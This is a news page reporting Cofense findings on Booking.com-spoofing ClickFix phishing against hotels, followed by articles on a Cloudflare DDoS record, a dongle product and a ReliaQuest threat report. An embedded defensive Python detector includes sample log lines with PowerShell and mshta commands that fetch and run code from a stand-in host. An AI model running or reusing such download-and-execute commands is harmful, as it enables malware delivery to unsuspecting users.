
ClickFix phishing surge spoofs Booking.com to target hotels
Research from Cofense Intelligence has identified a series of Booking.com-themed phishing campaigns targeting hotel chains in the accommodation and food services sector.
These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate Booking.com, directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware.
ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site.
Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed Booking.com spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware.
This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns.
The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively.
The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links.
Some emails specify that the link will only function on Windows, and recipients who open the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML Applications (HTA files), which, once executed, can install RATs or steal data from victim devices.
ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful.
In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
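The execution chain described above (a clipboard payload pasted into the Run prompt, which then launches PowerShell or mshta.exe with a remote URL) can be scored from process-creation telemetry. The following is an added example and not code from Cofense or the article; it assumes Sysmon/EDR-style fields (ParentImage, Image, CommandLine, User), and the tokens, weights and sample records are this example's own assumptions rather than a published detection rule.

```python
"""Score process-creation records for ClickFix-style execution. Added example,
not code from Cofense or the article; assumes Sysmon/EDR-style fields
(ParentImage, Image, CommandLine, User); tokens, weights and records are assumed."""
import re
from typing import Dict, List, Tuple

# Script hosts the article names as ClickFix carriers (PowerShell, MSHTA).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Download-cradle and stealth tokens typical of pasted one-liners (assumed heuristics).
CRADLE_TOKENS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web download": re.compile(r"\b(?:irm|iwr)\b|invoke-(?:webrequest|restmethod)|downloadstring", re.I),
}
URL_RE = re.compile(r"https?://", re.I)
ALERT_THRESHOLD = 4  # assumed cut-off: Run-prompt parent plus a remote URL is enough

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_record(rec: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons); anything other than a script host scores 0."""
    if basename(rec.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    score, reasons, cmd = 0, [], rec.get("CommandLine", "")
    # Commands pasted into the Run prompt are spawned by explorer.exe; a script
    # host with an interactive parent is the strongest single signal.
    if basename(rec.get("ParentImage", "")) == "explorer.exe":
        score, reasons = score + 2, reasons + ["spawned by explorer.exe (Run prompt)"]
    if URL_RE.search(cmd):
        score, reasons = score + 2, reasons + ["remote URL in command line"]
    for name, pattern in CRADLE_TOKENS.items():
        if pattern.search(cmd):
            score, reasons = score + 1, reasons + [name]
    return score, reasons

def scan(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one alert per record whose score reaches ALERT_THRESHOLD."""
    alerts = []
    for rec in records:
        score, reasons = score_record(rec)
        if score >= ALERT_THRESHOLD:
            alerts.append({"user": rec.get("User", "?"), "image": basename(rec["Image"]),
                           "score": score, "reasons": reasons})
    return alerts

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records (not real telemetry); example.invalid is a reserved domain.
SAMPLE_RECORDS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"HOTEL\frontdesk",
     "CommandLine": 'powershell -w hidden -c "irm http://example.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "User": r"HOTEL\frontdesk", "CommandLine": "mshta http://example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,  # scheduled admin script
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # interactive but benign
     "User": r"HOTEL\frontdesk", "CommandLine": "powershell -NoExit -c Get-Process"},
]
```

Running scan(SAMPLE_RECORDS) flags the first two records (scores 7 and 4) and leaves the scheduled backup script and the interactive Get-Process launch alone.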
Related Articles


Techday NZ, a day ago
Cloudflare thwarts record 7.3 Tbps DDoS attack with automation
Cloudflare has confirmed it recently mitigated what it describes as the largest distributed denial-of-service (DDoS) attack ever publicly disclosed, clocking in at 7.3 terabits per second (Tbps), surpassing previous known records. The attack, which occurred in mid-May 2025, targeted a hosting provider customer utilising Cloudflare's Magic Transit service for network defence. According to Cloudflare data, this incident follows closely on the heels of attacks recorded at 6.5 Tbps and 4.8 billion packets per second, illustrating that DDoS attacks are continuing to increase in both scale and complexity. Cloudflare stated that the 7.3 Tbps attack was 12% larger than its previous record and 1 Tbps greater than another recent attack reported by security journalist Brian Krebs.

Attack analysis
The 7.3 Tbps DDoS attack delivered a total of 37.4 terabytes of data within a 45-second window. During the attack, the targeted IP address was bombarded across an average of 21,925 destination ports, reaching a peak of 34,517 destination ports per second. The distribution of source ports mirrored this targeting method. The attack employed several vectors but was dominated by UDP floods, constituting 99.996% of total traffic. The residual traffic, amounting to 1.3 GB, involved QOTD reflection, Echo reflection, NTP reflection, Mirai UDP floods, Portmap flood, and RIPv1 amplification techniques. Each vector was identified and catalogued, with Cloudflare detailing how organisations could protect both themselves and the broader Internet from such forms of abuse. Cloudflare explained that the UDP DDoS component worked by sending large volumes of UDP packets to random or specific destination ports, either to saturate the Internet link or overwhelm network appliances. Other vectors, such as QOTD (Quote of the Day), Echo, NTP, Portmap, and RIPv1, exploited vulnerabilities in legacy protocols and services to reflect and amplify attack traffic onto target systems.

Global scale
The attack was notable for its global reach. Traffic originated from more than 122,145 source IP addresses across 5,433 autonomous systems in 161 countries. Nearly half of the attack traffic came from Brazil and Vietnam, accounting for around twenty-five percent each. The remainder was largely attributable to sources in Taiwan, China, Indonesia, Ukraine, Ecuador, Thailand, the United States, and Saudi Arabia. At an autonomous system level, Telefonica Brazil (AS27699) contributed 10.5% of attack traffic, with Viettel Group (AS7552), China Unicom (AS4837), Chunghwa Telecom (AS3462), and China Telecom (AS4134) among the other major sources. The attack saw an average of 26,855 unique source IP addresses per second, peaking at 45,097.

Technical response
Cloudflare utilised its global anycast architecture to divert and dissipate the massive influx of traffic. As packets arrived at Cloudflare's network edge, they were routed to the closest data centre. This incident was managed across 477 data centres in 293 locations worldwide, with some regions operating multiple facilities due to traffic volume. Detection and mitigation were handled by Cloudflare's automated systems, which operate independently in each data centre. As Cloudflare put it: "The Cloudflare global network runs every service in every data centre. This includes our DDoS detection and mitigation systems. This means that attacks can be detected and mitigated fully autonomously, regardless of where they originate from." Upon arrival, data packets were intelligently distributed to available servers where they were sampled for analysis. Cloudflare employed the denial of service daemon (dosd), a heuristic engine that reviews packet headers and anomalies for malicious patterns. The system then generated multiple permutations of digital fingerprints specific to the attack, seeking patterns that maximised blocking efficacy while minimising impact on legitimate traffic.

Within data centres, real-time intelligence was shared by servers multicasting fingerprint information, refining mitigation on both a local and global scale. When a fingerprint surpassed predefined thresholds, mitigation rules were compiled and deployed as extended Berkeley Packet Filter (eBPF) programs to block the offending traffic. Once the attack ceased, associated rules were removed automatically.

Botnet feed and future mitigation
Cloudflare also maintains a free DDoS Botnet Threat Feed to help Internet service providers and hosting companies identify malicious traffic originating within their own infrastructure. The company said that over 600 organisations have subscribed to this service, allowing them to receive up-to-date lists of offending IP addresses engaged in DDoS attacks. Recommendations from Cloudflare emphasise tailored defences to address the unique characteristics of each network or application, with care taken to ensure that mitigation steps do not inadvertently disrupt legitimate traffic, particularly for services that depend on UDP or legacy protocols. Cloudflare's team highlighted that these successful defences occurred entirely without human intervention, alerting, or incident escalation, underscoring the shift towards fully autonomous, distributed mitigation strategies in response to modern DDoS threats.


Scoop, a day ago
MakeDongle 2 - USB Dongle Protection For MacOS, Windows And Linux
Excel Software announced MakeDongle 2.0 for macOS or Windows. MakeDongle generates a secure USB dongle from a flash drive. The dongle grants a license to run protected software on all modern versions of Mac, Windows or Linux OS. MakeDongle complements a diverse suite of protection and licensing tools from Excel Software. Protected software can be stored on the computer or dongle itself. On application launch, the dongle is validated before the software is allowed to run. Each dongle can be generated in seconds. When building dongles, MakeDongle can copy multiple licenses, applications or installers to the USB flash drive.

MakeDongle can be used standalone or with the QuickLicense, AppProtect or DocProtect products. It also works with licensing plugins for FileMaker and Xojo. To use MakeDongle alone, several coding interfaces are supported with sample code provided for popular programming languages.

MakeDongle works with QuickLicense. QuickLicense supports many license types including Trial, Product, Try/Buy and Subscription. Software is protected by adding API programming commands or by using the AddLicense wrapping tool without programming. AddLicense is a popular choice for runtime environments like MAX, Adobe Air or Unity since application code and resources can be securely embedded within the EXE or APP file. Protected software can immediately launch when the appropriate dongle is present or optionally require a manual or online activation process. MakeDongle and QuickLicense give developers many options for software and hardware protection. Excel spreadsheets can be protected using QuickLicense and OfficeProtect to produce an EXE for Windows or APP for Mac. This protection can be combined with a USB dongle to allow the App to run. The application and encrypted data files can be stored on the dongle, making them easily portable between computers.

MakeDongle works with QuickLicenseRT Linux. QuickLicense and MakeDongle run on a Mac or Windows computer to produce a dongle and license files. The protected software runs on a Linux computer with the dongle installed in any free USB port.

MakeDongle works with DocProtect on Mac, Windows or Linux. DocProtect wraps PDF, Video, Image slide shows or HTML files into a Mac or Windows application. The protected document can be used on any computer when the dongle is present. MakeDongle, DocProtect and QuickLicense can be combined to support other license types and features. MakeDongle can be used with AppProtect to wrap Mac or Windows software into a protected application that only runs if the dongle is present. Dongle-secured installers can be created using MakeDongle plus ClickInstall on Mac or Windows. The installer only runs if the dongle is present and can be distributed on the dongle itself.

MakeDongle 2.0 is $495 for a Single User License on Mac or Windows. Produce unlimited dongles for any number of products. The product includes royalty-free distribution rights for protected software. MakeDongle Mac is a Universal (Intel & Apple Silicon) App that runs on macOS 10.14 or later. MakeDongle Windows runs on Windows 10 or 11. Visit the company web site for demonstration videos and product information.


Techday NZ, 2 days ago
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.

ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."

Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."

Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.

MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.

Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."

Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.

Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.

Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."

Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.